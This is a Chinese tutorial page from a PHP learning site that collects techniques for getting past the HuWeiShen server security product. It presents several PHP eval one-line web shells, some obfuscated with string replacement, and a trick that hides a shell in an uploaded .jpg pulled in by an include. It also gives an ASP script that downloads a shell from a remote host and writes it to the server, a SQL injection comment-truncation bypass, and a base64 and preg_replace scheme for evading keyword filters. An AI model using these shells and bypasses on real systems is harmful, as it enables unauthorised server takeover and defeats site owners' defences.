网站地图    收藏   

主页 > 后端 > 网站安全 >

破那个护卫神技术总汇 - 网站安全 - 自学php

来源:自学PHP网    时间:2015-04-17 11:59 作者: 阅读:

[导读] 一、马儿篇,都是以前可以过护卫神的马二、注入篇,可以绕过注入的方法三、规则篇,根据护卫神的过滤规则大家可以自己设计马儿一、马儿篇-1号ndash;?php@eval($_POST[#39;1#39;])......

一、马儿篇,都是以前可以过护卫神的马
二、注入篇,可以绕过注入的方法
三、规则篇,根据护卫神的过滤规则大家可以自己设计马儿

一、马儿篇
—————-1号————————–

<?php
@eval
($_POST['1']);?>

—————-2号————————–

<title>login</title>nono<?php
 
eval
($_POST
[1])
 
?>
——————–3号————————

<?php $a = str_replace(x,”",”axsxxsxexrxxt”);
$a($_POST["c"]); ?>

菜刀直接连,不需要构造连接字符串,密码 c

——————–类似于过安全狗的包含方法——————————————-
A.asp版本:

将一句话保存为  XX.jpg  上传后 地址为  …/xxxxxx.jpg

在上传一个 x.asp 内容为 <!–#include  file=”../xxxxxx.jpg”–>

B.php版本

如果是php的话:

<?php
include “1.htm”;
?>

——————实在不行,还可以下载——————————————————
远程下载马

<%
Set xPost = CreateObject(“Microsoft.XMLHTTP”)
xPost.Open “GET”,”http://www.xxx.com/123/1.txt”,False
xPost.Send()
Set sGet = CreateObject(“ADODB.Stream”)
sGet.Mode = 3
sGet.Type = 1
sGet.Open()
sGet.Write(xPost.responseBody)
sGet.SaveToFile Server.MapPath(“ls.asp”),2
set sGet = nothing
set sPOST = nothing
%>

—————————————————————

二、注入篇

/*%00*/截断符
select/*%00*/* from admin;

—————————————————————

三、规则篇

可以利用类似:

<?php
$code=’一串base64′; //base64编码
$x=str_replace(‘f’,”",”bfafsfef6f4f_ffdffeffcffoffdffef”); //字符串替换
$a = ‘/a/’;//正则规则
preg_replace($a,’e’.’v’.’a’.’l’.’(‘.$x.’(‘.$code.’))’,'a’); //正则替换
?>

方法绕过关键词过滤
  

自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习

京ICP备14009008号-1@版权所有www.zixuephp.com

网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com

添加评论